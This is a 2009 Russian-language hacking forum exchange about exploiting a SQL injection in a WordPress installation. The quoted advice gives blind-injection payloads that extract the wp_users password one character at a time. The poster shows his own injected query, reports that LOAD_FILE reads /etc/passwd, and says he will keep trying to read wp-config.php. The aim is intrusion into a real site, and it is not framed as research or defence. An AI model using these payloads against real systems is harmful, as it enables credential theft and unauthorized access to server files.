25.10.2009, 22:07
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Сообщение от L I G A
погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:
Код:
profile.php?id=2+and+length(user_pass)>0
пароль:
Код:
id=2+and+ascii(substring(user_pass,1,1))>127
^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.
Спасибо за ответ.
Статья и правда замечательная, вчера её прочитал. Из неё и понял, что моя скуля почти бесполезна 
В запросе не используется таблица wp_users:
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =15 or 3=substring(version(),1,1) -- f AND crnt.category_id = 16
LOAD_FILE('/etc/passwd') - работает, можно посимвольно читать.
Но LOAD_FILE('/ip/site/www/wp-config.php') - уже не работает. На сколько я понимаю, права на чтение для папки /ip/site/www/ стоят только для апача (.
Буду искать дальше
|
|
|